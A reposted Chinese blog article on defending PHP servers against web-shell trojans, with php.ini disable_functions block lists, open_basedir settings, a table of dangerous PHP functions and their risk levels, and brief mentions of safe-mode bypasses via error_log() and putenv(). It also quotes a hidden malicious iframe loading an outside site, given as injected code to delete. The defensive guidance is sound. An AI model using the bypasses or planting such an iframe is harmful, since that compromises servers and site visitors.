PHP木马的防范方法
来源:互联网 发布:编程男士性格好怪 编辑:程序博客网 时间:2024/04/29 00:01
打开safe_mode, 在,php.ini中设置 disable_functions=passthru,exec,shell_exec,system二者选一即可,也可都选。
二、防止跳出web目录
首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行:php_admin_value open_basedir /usr/local/apache/htdocs,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误:Warning: open_basedir restriction in effect. File is in wrongdirectory in /usr/local/apache/htdocs/open.php on line 4等等。
三、防止php木马读写文件目录
在php.ini中的 disable_functions= passthru,exec,shell_exec,system后面加上php处理文件的函数,主要有fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile。即成为 disable_functions=passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile。
ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:
net user apache f**kmicrosoft/add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-thisaccount,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。
总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。
phpinfo()
功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。
危险等级:中
passthru()
功能描述:允许执行一个外部程序并回显输出,类似于 exec()。
危险等级:高
exec()
功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。
危险等级:高
system()
功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。
危险等级:高
chroot()
功能描述:可改变当前 PHP 进程的工作根目录,仅当系统支持 CLI 模式
PHP 时才能工作,且该函数不适用于 Windows 系统。
危险等级:高
scandir()
功能描述:列出指定路径中的文件和目录。
危险等级:中
chgrp()
功能描述:改变文件或目录所属的用户组。
危险等级:高
chown()
功能描述:改变文件或目录的所有者。
危险等级:高
shell_exec()
功能描述:通过 Shell 执行命令,并将执行结果作为字符串返回。
危险等级:高
proc_open()
功能描述:执行一个命令并打开文件指针用于读取以及写入。
危险等级:高
proc_get_status()
功能描述:获取使用 proc_open() 所打开进程的信息。
危险等级:高
error_log()
功能描述:将错误信息发送到指定位置(文件)。
安全备注:在某些版本的 PHP 中,可使用 error_log() 绕过 PHP safe mode,
执行任意命令。
危险等级:低
ini_alter()
功能描述:是 ini_set() 函数的一个别名函数,功能与 ini_set() 相同。
具体参见 ini_set()。
危险等级:高
ini_set()
功能描述:可用于修改、设置 PHP 环境配置参数。
危险等级:高
ini_restore()
功能描述:可用于恢复 PHP 环境配置参数到其初始值。
危险等级:高
dl()
功能描述:在 PHP 进行运行过程当中(而非启动时)加载一个 PHP 外部模块。
危险等级:高
pfsockopen()
功能描述:建立一个 Internet 或 UNIX 域的 socket 持久连接。
危险等级:高
syslog()
功能描述:可调用 UNIX 系统的系统层 syslog() 函数。
危险等级:中
readlink()
功能描述:返回符号连接指向的目标文件内容。
危险等级:中
symlink()
功能描述:在 UNIX 系统中建立一个符号链接。
危险等级:高
popen()
功能描述:可通过 popen() 的参数传递一条命令,并对 popen() 所打开的文件进行执行。
危险等级:高
stream_socket_server()
功能描述:建立一个 Internet 或 UNIX 服务器连接。
危险等级:中
putenv()
功能描述:用于在 PHP 运行时改变系统字符集环境。在低于 5.2.6 版本的 PHP 中,可利用该函数
修改系统字符集环境后,利用 sendmail 指令发送特殊参数执行系统 SHELL 命令。
危险等级:高
禁用方法如下:
打开/etc/php.ini文件,
查找到 disable_functions ,添加需禁用的函数名,如下:
phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
访问网站含有恶意软件提示及广告分析解决
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe> 删掉
- PHP木马的防范方法
- 全世界最小的php网页木马一枚 附PHP木马的防范方法
- 防范php木马
- JS木马的原理及防范方法
- asp木马防范方法
- 木马的防范
- 木马的防范
- PHP脚本木马防范经验
- 两种比较典型的ASP木马防范方法
- 两种比较典型的ASP木马防范方法2
- ASP木马的防范 (zz)
- 视频木马简介与防范方法
- Php注入的安全防范方法
- 关于导致搜索引擎来路流量转移的php木马介绍及防范
- php 网站服务器查找木马的方法
- ASP木马Webshell的安全防范解决办法
- 防范ASP木马的十大基本原则
- 视频木马的制作与防范
- redis 3.2 protected-mode配置
- 当spring 容器初始化完成后执行某个方法
- NOIP2010普及组 导弹拦截(重庆一中高2018级信息学竞赛测验3) 解题报告
- HDU 2406 Power Strings KMP 基础
- Android Studio中获取sha1证书指纹数据的方法
- PHP木马的防范方法
- 合并果子解题分析
- Java反射机制的学习
- AsyncTask的使用
- 滴滴的程维应该是幸福的
- iOS RunLoop 的 Mode
- ExtJs6 时间转换为'x天','x小时','x分','x秒前'并且鼠标移上去悬浮提示具体时间
- JavaScript encodeURI() 函数详解
- Linux内核---58.kthread与wait_event